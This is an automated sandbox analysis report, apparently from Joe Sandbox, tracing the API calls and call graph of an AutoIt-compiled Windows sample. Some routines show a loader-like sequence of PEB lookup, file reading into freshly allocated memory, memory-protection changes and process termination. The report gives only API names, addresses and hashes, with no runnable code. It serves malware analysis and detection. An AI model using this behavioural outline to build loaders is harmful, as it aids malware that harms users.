86603 42d20c 86602->86603 86612 42dbb9 86602->86612 86856 40c3e0 74 API calls 86602->86856 86857 40c620 117 API calls 86602->86857 86859 40be00 74 API calls 86602->86859 86860 40e380 VariantClear 86602->86860 86603->86435 86858 410ae0 VariantClear 86606->86858 86618 40a481 86607->86618 86874 40c8a0 VariantClear 86607->86874 86854 401380 74 API calls 86610->86854 86612->86562 86614 402cc0 74 API calls 86614->86638 86615 4092c0 VariantClear 86647 40a534 86615->86647 86616 41171a 74 API calls 86616->86638 86617 411421 73 API calls 86617->86638 86619 40a4ed 86618->86619 86620 42dc1e VariantClear 86618->86620 86618->86647 86625 40a4ff 86619->86625 86875 40e380 VariantClear 86619->86875 86620->86625 86624 41171a 74 API calls 86624->86647 86625->86624 86625->86647 86628 44b3f6 74 API calls 86628->86638 86629 42deb6 VariantClear 86629->86647 86630 40a73c 86633 42e237 86630->86633 86640 40a76b 86630->86640 86631 40e380 VariantClear 86631->86647 86872 4721e5 VariantClear 86632->86872 86879 46e709 VariantClear VariantClear 86633->86879 86634 42dfe9 VariantClear 86634->86647 86635 42df47 VariantClear 86635->86647 86636 40a7a2 86650 40a7ad 86636->86650 86880 40b800 VariantClear VariantClear 86636->86880 86638->86581 86638->86596 86638->86610 86638->86614 86638->86616 86638->86617 86638->86628 86638->86632 86639 40a053 86638->86639 86868 45ee98 74 API calls 86638->86868 86869 4019e0 75 API calls 86638->86869 86870 404260 75 API calls 86638->86870 86871 409210 VariantClear 86638->86871 86639->86435 86640->86636 86662 40a800 86640->86662 86853 40b800 VariantClear VariantClear 86640->86853 86643 41171a 74 API calls 86643->86647 86644 41171a 74 API calls 86649 42dd10 VariantInit VariantCopy 86644->86649 86645 40a8b0 86656 40a8c2 86645->86656 86882 40e380 VariantClear 86645->86882 86646 42e312 86648 42e337 VariantClear 86646->86648 86646->86656 86647->86615 86647->86629 86647->86630 86647->86631 86647->86633 86647->86634 86647->86635 86647->86643 86647->86644 86876 46e9cd 74 API calls 86647->86876 86877 409210 VariantClear 86647->86877 86878 44cc6c VariantClear 86647->86878 86648->86656 86649->86647 86652 42dd30 VariantClear 86649->86652 86651 40a7ee 86650->86651 86658 42e2a7 VariantClear 86650->86658 86650->86662 86651->86662 86881 40e380 VariantClear 86651->86881 86652->86647 86653 42e3b2 86659 42e3da VariantClear 86653->86659 86663 40a91a 86653->86663 86656->86653 86657 40a908 86656->86657 86657->86663 86883 40e380 VariantClear 86657->86883 86658->86662 86659->86663 86660 42e47f 86666 42e4a3 VariantClear 86660->86666 86671 40a957 86660->86671 86662->86645 86662->86646 86663->86660 86665 40a945 86663->86665 86665->86671 86884 40e380 VariantClear 86665->86884 86666->86671 86668 40aa22 86668->86435 86669 42e559 VariantClear 86669->86671 86671->86668 86671->86669 86885 40e380 VariantClear 86671->86885 86672->86429 86673->86454 86674->86454 86675->86454 86676->86454 86677->86454 86678->86454 86680 40412e 86679->86680 86681 4092c0 VariantClear 86680->86681 86682 404138 86681->86682 86682->86453 86683->86454 86684->86454 86685->86435 86686->86427 86687->86435 86688->86435 86689->86470 86690->86473 86691->86489 86692->86490 86693->86477 86694->86494 86695->86514 86696->86521 86697->86494 86698->86523 86699->86494 86700->86523 86701->86494 86702->86507 86703->86523 86704->86510 86705->86523 86706->86504 86707->86528 86709 4092c0 VariantClear 86708->86709 86710 40416e 86709->86710 86711 404120 VariantClear 86710->86711 86712 40419b 86711->86712 86718 4734b7 86712->86718 86762 40efe0 86712->86762 86713 4041c6 86713->86526 86713->86537 86716->86526 86717->86529 86719 453063 110 API calls 86718->86719 86720 4734d7 86719->86720 86721 473545 86720->86721 86722 47350c 86720->86722 86770 463c42 86721->86770 86723 4092c0 VariantClear 86722->86723 86730 473514 86723->86730 86725 473558 86726 47355c 86725->86726 86743 473595 86725->86743 86727 4092c0 VariantClear 86726->86727 86736 473564 86727->86736 86728 473616 86783 463d7e 86728->86783 86730->86713 86731 473622 86733 473697 86731->86733 86734 47362c 86731->86734 86732 453063 110 API calls 86732->86743 86817 457838 86733->86817 86737 4092c0 VariantClear 86734->86737 86736->86713 86740 473634 86737->86740 86740->86713 86742 473655 86745 4092c0 VariantClear 86742->86745 86743->86728 86743->86732 86743->86742 86829 462f5a 86 API calls 86743->86829 86755 47365d 86745->86755 86746 4736b0 86830 45e62e 115 API calls 86746->86830 86747 4736c9 86831 40e7e0 75 API calls 86747->86831 86750 4736ba GetCurrentProcess TerminateProcess 86750->86747 86751 4736db 86758 4736ff 86751->86758 86832 40d030 75 API calls 86751->86832 86752 473731 86759 473744 FreeLibrary 86752->86759 86760 47374b 86752->86760 86754 4736f1 86833 46b945 133 API calls 86754->86833 86755->86713 86758->86752 86834 40d030 75 API calls 86758->86834 86835 46b945 133 API calls 86758->86835 86759->86760 86760->86713 86763 40eff5 CreateFileW 86762->86763 86764 4299bf 86762->86764 86766 40f017 86763->86766 86765 4299c4 CreateFileW 86764->86765 86764->86766 86765->86766 86767 4299ea 86765->86767 86766->86713 86851 40e0d0 SetFilePointerEx SetFilePointerEx 86767->86851 86769 4299f5 86769->86766 86836 45335b 75 API calls 86770->86836 86772 463c5d 86837 442c52 79 API calls 86772->86837 86774 463c72 86776 40c060 74 API calls 86774->86776 86782 463cac 86774->86782 86777 463c8e 86776->86777 86838 4608ce 74 API calls 86777->86838 86779 463ca4 86780 40c740 74 API calls 86779->86780 86780->86782 86781 463cf7 86781->86725 86782->86781 86839 462f5a 86 API calls 86782->86839 86784 453063 110 API calls 86783->86784 86785 463d99 86784->86785 86786 463de0 86785->86786 86787 463dca 86785->86787 86841 40c760 77 API calls 86786->86841 86840 453081 110 API calls 86787->86840 86790 463dd0 LoadLibraryW 86799 463e09 86790->86799 86791 463de7 86810 463e19 86791->86810 86842 40c760 77 API calls 86791->86842 86793 463dfb 86793->86810 86843 40c760 77 API calls 86793->86843 86794 463e3e 86795 463e4e 86794->86795 86796 463e7b 86794->86796 86844 40d500 74 API calls 86795->86844 86846 40c760 77 API calls 86796->86846 86799->86794 86799->86810 86801 463e57 86845 45efe7 76 API calls 86801->86845 86802 463e82 GetProcAddress 86805 463e90 86802->86805 86804 463e62 GetProcAddress 86807 463e79 86804->86807 86806 463edf 86805->86806 86805->86807 86805->86810 86806->86810 86811 463eef FreeLibrary 86806->86811 86807->86805 86847 403470 74 API calls 86807->86847 86809 463eb4 86848 40d500 74 API calls 86809->86848 86810->86731 86811->86810 86813 463ebd 86849 45efe7 76 API calls 86813->86849 86815 463ec8 GetProcAddress 86850 401330 86815->86850 86818 457a4c 86817->86818 86824 45785f 86817->86824 86825 410d40 86818->86825 86819 40c760 77 API calls 86819->86824 86820 453081 110 API calls 86820->86824 86821 443576 77 API calls 86821->86824 86822 4138ba 66 API calls 86822->86824 86823 40f580 76 API calls 86823->86824 86824->86818 86824->86819 86824->86820 86824->86821 86824->86822 86824->86823 86826 410d55 86825->86826 86827 410ded VirtualProtect 86826->86827 86828 410dbb 86826->86828 86827->86828 86828->86746 86828->86747 86829->86743 86830->86750 86831->86751 86832->86754 86833->86758 86834->86758 86835->86758 86836->86772 86837->86774 86838->86779 86839->86781 86840->86790 86841->86791 86842->86793 86843->86799 86844->86801 86845->86804 86846->86802 86847->86809 86848->86813 86849->86815 86850->86806 86851->86769 86852->86547 86853->86636 86854->86555 86855->86560 86856->86602 86857->86602 86858->86668 86859->86602 86860->86602 86861->86578 86862->86594 86863->86600 86864->86572 86865->86576 86866->86580 86867->86638 86868->86638 86869->86638 86870->86638 86871->86638 86872->86596 86873->86612 86874->86607 86875->86625 86876->86647 86877->86647 86878->86647 86879->86636 86880->86650 86881->86662 86882->86656 86883->86663 86884->86671 86885->86671 86886->86612 86887->86565 86888 42919b 86893 40ef10 86888->86893 86891 411421 73 API calls 86892 4291aa 86891->86892 86894 41171a 74 API calls 86893->86894 86895 40ef17 86894->86895 86896 42ad48 86895->86896 86901 40ef40 73 API calls 86895->86901 86898 40ef2a 86902 40e470 86898->86902 86901->86898 86903 40c060 74 API calls 86902->86903 86904 40e483 GetVersionExW 86903->86904 86905 4021e0 74 API calls 86904->86905 86906 40e4bb 86905->86906 86928 40e600 86906->86928 86913 42accc 86914 42ad28 GetSystemInfo 86913->86914 86918 42ad38 GetSystemInfo 86914->86918 86915 40e557 GetCurrentProcess 86948 40ee30 LoadLibraryA GetProcAddress 86915->86948 86916 40e56c 86916->86918 86941 40eee0 86916->86941 86921 40e5c9 86945 40eea0 86921->86945 86924 40e5e0 86926 40e5f1 FreeLibrary 86924->86926 86927 40e5f4 86924->86927 86925 40e5dd FreeLibrary 86925->86924 86926->86927 86927->86891 86929 40e60b 86928->86929 86930 40c740 74 API calls 86929->86930 86931 40e4c2 86930->86931 86932 40e620 86931->86932 86933 40e62a 86932->86933 86934 42ac93 86933->86934 86935 40c740 74 API calls 86933->86935 86936 40e4ce 86935->86936 86936->86913 86937 40ee70 86936->86937 86938 40e551 86937->86938 86939 40ee76 LoadLibraryA 86937->86939 86938->86915 86938->86916 86939->86938 86940 40ee87 GetProcAddress 86939->86940 86940->86938 86942 40e5bf 86941->86942 86943 40eee6 LoadLibraryA 86941->86943 86942->86914 86942->86921 86943->86942 86944 40eef7 GetProcAddress 86943->86944 86944->86942 86949 40eec0 LoadLibraryA GetProcAddress 86945->86949 86947 40e5d3 GetNativeSystemInfo 86947->86924 86947->86925 86948->86916 86949->86947 86950 4549888 86964 45474d8 86950->86964 86952 4549953 86967 4549778 86952->86967 86954 454997c CreateFileW 86956 45499d0 86954->86956 86957 45499cb 86954->86957 86956->86957 86958 45499e7 VirtualAlloc 86956->86958 86958->86957 86959 4549a05 ReadFile 86958->86959 86959->86957 86960 4549a20 86959->86960 86961 4548778 13 API calls 86960->86961 86963 4549a53 86961->86963 86962 4549a76 ExitProcess 86962->86957 86963->86962 86970 454a978 GetPEB 86964->86970 86966 4547b63 86966->86952 86968 4549781 Sleep 86967->86968 86969 454978f 86968->86969 86971 454a9a2 86970->86971 86971->86966 86972 42e89e 86979 40c000 86972->86979 86974 42e8ac 86975 409a40 164 API calls 86974->86975 86976 42e8ca 86975->86976 86990 44b92e VariantClear 86976->86990 86978 42f3ae 86980 40c014 86979->86980 86981 40c007 86979->86981 86983 40c01a 86980->86983 86984 40c02c 86980->86984 86991 409210 VariantClear 86981->86991 86992 409210 VariantClear 86983->86992 86987 41171a 74 API calls 86984->86987 86985 40c00f 86985->86974 86989 40c033 86987->86989 86988 40c023 86988->86974 86989->86974 86990->86978 86991->86985 86992->86988

                                                                                                                Executed Functions

                                                                                                                Function 00409A40 Relevance: 30.4, APIs: 14, Strings: 2, Instructions: 2432COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID: 0vH$4RH
                                                                                                                • API String ID: 3964851224-2085553193
                                                                                                                • Opcode ID: 46287a7bb28814e7acc9e24331a329a483cab8fdfa0313037193f1b97064f243
                                                                                                                • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                                                                                                                • Opcode Fuzzy Hash: 46287a7bb28814e7acc9e24331a329a483cab8fdfa0313037193f1b97064f243
                                                                                                                • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B
                                                                                                                Function 0040E470 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 165COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1124 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 1133 40e506-40e509 1124->1133 1134 42accc-42acd1 1124->1134 1137 40e540-40e555 call 40ee70 1133->1137 1138 40e50b-40e51c 1133->1138 1135 42acd3-42acdb 1134->1135 1136 42acdd-42ace0 1134->1136 1140 42ad12-42ad20 1135->1140 1141 42ace2-42aceb 1136->1141 1142 42aced-42acf0 1136->1142 1151 40e557-40e573 GetCurrentProcess call 40ee30 1137->1151 1152 40e579-40e5a8 1137->1152 1143 40e522-40e525 1138->1143 1144 42ac9b-42aca7 1138->1144 1150 42ad28-42ad2d GetSystemInfo 1140->1150 1141->1140 1142->1140 1148 42acf2-42ad06 1142->1148 1143->1137 1149 40e527-40e537 1143->1149 1146 42acb2-42acba 1144->1146 1147 42aca9-42acad 1144->1147 1146->1137 1147->1137 1153 42ad08-42ad0c 1148->1153 1154 42ad0e 1148->1154 1155 42acbf-42acc7 1149->1155 1156 40e53d 1149->1156 1158 42ad38-42ad3d GetSystemInfo 1150->1158 1151->1152 1165 40e575 1151->1165 1152->1158 1159 40e5ae-40e5c3 call 40eee0 1152->1159 1153->1140 1154->1140 1155->1137 1156->1137 1159->1150 1164 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 1159->1164 1168 40e5e0-40e5ef 1164->1168 1169 40e5dd-40e5de FreeLibrary 1164->1169 1165->1152 1170 40e5f1-40e5f2 FreeLibrary 1168->1170 1171 40e5f4-40e5ff 1168->1171 1169->1168 1170->1171
                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32 ref: 0040E495
                                                                                                                • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                                                                • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion
                                                                                                                • String ID: pMH
                                                                                                                • API String ID: 3079510601-2522892712
                                                                                                                • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                                                                • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                                                                Function 0040EB70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1710 40eb70-40eb74 1711 40eb96 1710->1711 1712 40eb76-40eb85 LoadLibraryA 1710->1712 1712->1711 1713 40eb87-40eb93 GetProcAddress 1712->1713 1713->1711
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                                                                                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: IsThemeActive$uxtheme.dll
                                                                                                                • API String ID: 2574300362-3542929980
                                                                                                                • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                                                                • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28
                                                                                                                Function 004095C7 Relevance: 21.5, APIs: 14, Instructions: 539sleeptimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00409870
                                                                                                                • timeGetTime.WINMM ref: 00409880
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharSleepTimeUppertime
                                                                                                                • String ID:
                                                                                                                • API String ID: 2141449944-0
                                                                                                                • Opcode ID: da6b74c52f7fd8fa7285d44dc66266380a963bd06260c315e722df216112258b
                                                                                                                • Instruction ID: 79dfb759edd1749a95aa3438e3198289cebfc990e9c1b7da565b255c5aac8c6d
                                                                                                                • Opcode Fuzzy Hash: da6b74c52f7fd8fa7285d44dc66266380a963bd06260c315e722df216112258b
                                                                                                                • Instruction Fuzzy Hash: D422F171608342ABC724DF64C984BABB7A0BF89304F14492FE54997392D77CEC45CB9A
                                                                                                                Function 004102F0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32 ref: 00410326
                                                                                                                • RegisterClassExW.USER32 ref: 00410359
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                • ImageList_ReplaceIcon.COMCTL32(00A000D8,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                                                                • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A
                                                                                                                Function 004101F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 74windowregistryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                • LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                • LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                • LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                • RegisterClassExW.USER32 ref: 004102C6
                                                                                                                  • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                                                                  • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                                                                  • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                  • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                  • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                  • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                  • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00A000D8,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                • String ID: #$0$PGH
                                                                                                                • API String ID: 423443420-3673556320
                                                                                                                • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                                                                • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99
                                                                                                                Function 004255C4 Relevance: 14.1, APIs: 9, Instructions: 579fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(00000080,00000000,00000080,0000000C,00000001,00000080,00000000,00000109,00000000,00000109), ref: 004257F3
                                                                                                                • CreateFileW.KERNEL32(00000080,7FFFFFFF,00000001,0000000C,00000001,00000080,00000000), ref: 0042582C
                                                                                                                • GetLastError.KERNEL32 ref: 00425851
                                                                                                                • GetFileType.KERNELBASE(?), ref: 0042586D
                                                                                                                • GetLastError.KERNEL32 ref: 00425892
                                                                                                                • CloseHandle.KERNEL32(?), ref: 004258A4
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00425C6A
                                                                                                                • CreateFileW.KERNEL32(00000080,00000000,00000001,0000000C,00000003,00000080,00000000), ref: 00425C87
                                                                                                                • GetLastError.KERNEL32 ref: 00425C92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CreateErrorLast$CloseHandle$Type
                                                                                                                • String ID:
                                                                                                                • API String ID: 352418905-0
                                                                                                                • Opcode ID: 9a2842c33dd42d113f273929bf8fd8cb84c1a2513e7f56b17b889415b9c929d6
                                                                                                                • Instruction ID: 669c70fe02d08c48a4bfc23b5c295140071241b72d0cac454048e7f20503c7df
                                                                                                                • Opcode Fuzzy Hash: 9a2842c33dd42d113f273929bf8fd8cb84c1a2513e7f56b17b889415b9c929d6
                                                                                                                • Instruction Fuzzy Hash: DF222371A00A299BDF219F68E8857AE7BB1EF01314FA4066AE451D7391D33D8D80CB59
                                                                                                                Function 0041E7DC Relevance: 12.5, APIs: 8, Instructions: 520COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ec6185bb95033948424997075615cd394999d7b3352a51c3c84c5f176d9edcdf
                                                                                                                • Instruction ID: 60237bb9b030d907ca0bd1bf58dcbb3909e656aee1947051e473b0785f795cf0
                                                                                                                • Opcode Fuzzy Hash: ec6185bb95033948424997075615cd394999d7b3352a51c3c84c5f176d9edcdf
